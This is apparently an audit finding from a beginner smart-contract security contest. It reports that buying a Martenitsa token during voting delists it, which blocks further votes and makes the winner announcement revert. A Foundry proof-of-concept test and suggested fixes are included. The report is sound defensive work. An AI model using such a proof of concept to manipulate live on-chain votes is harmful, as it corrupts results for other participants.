First Flight #13: Baba Marta

First Flight #13

Beginner FriendlyFoundryGameFi

100 EXP

View results

Previous Next

Submission Details

Severity: medium

Valid

Martenitsa Token sold during `MartenitsaVoting.sol` can not recive votes nor be declared winner

MrCrowNFT

Summary

In order to recive votes a Martenitza token needs to be listed for sale, but when bought, it is longer listed as such.

Vulnerability Details

During the voting period of MartenitsaVoting.sol, as only tokens listed for sale can recive votes, any user can call MartenitsaMarketplace::buyMartenitsa function to buy said token, deliting it's tokenIdToListing[], therefor it can no longer recive votes, furthermore, if it has the biggest vote count, the announceWinner function reverts. This could be used maliciously by users and producers to influence voting results.

##Proof of code
You may add this code to MartenitsaToken.t.sol to corroborate the the vulnerability

function testBuyMartenitsaInVotingPeriodPreventsItFromGettingMoreVotes() public{

//start voting period

vm.warp(block.timestamp);

voting.startVoting();

//create Martenitsa and list it for sale so it can recive votes

vm.startPrank(chasy);

martenitsaToken.createMartenitsa("bracelet");

marketplace.listMartenitsaForSale(0, 1 wei);

martenitsaToken.approve(address(marketplace), 0);

vm.stopPrank();

//user (bob) votes for Martenitsa

vm.prank(bob);

voting.voteForMartenitsa(0);

vm.stopPrank();

//user(bob) buys Martenitsa

vm.prank(bob);

marketplace.buyMartenitsa{value: 1 wei}(0);

vm.stopPrank();

//defferent user (jack) can no longer vote for the martenitsa

vm.prank(jack);

vm.expectRevert();

voting.voteForMartenitsa(0);

vm.stopPrank();

//voteCount does not change after been bought

console2.log(voting.getVoteCount(0));

//finish voting period and announce winner

vm.warp(block.timestamp + 1 days + 1);

vm.recordLogs();

vm.expectRevert();

voting.announceWinner();

}

Impact

High impact, as this disrupts the purpuse and functionality of the voting and reward system.

Tools Used

Manual review

Recommendations

In order to resolve this issue you may:

Eliminate the list.forSale requirement for voting for Martenitsa Token.
Make a mapping of (address ownerAtBegginingOfVotingPeriod => TokenID) so that the bought of the token doesn't disrup the voting period, as well as, using said mapping to announce the winner token.

Updates

Lead Judging Commences

bube Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

Unable to receive reward

Rewards breakdown

nSLOC

239

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.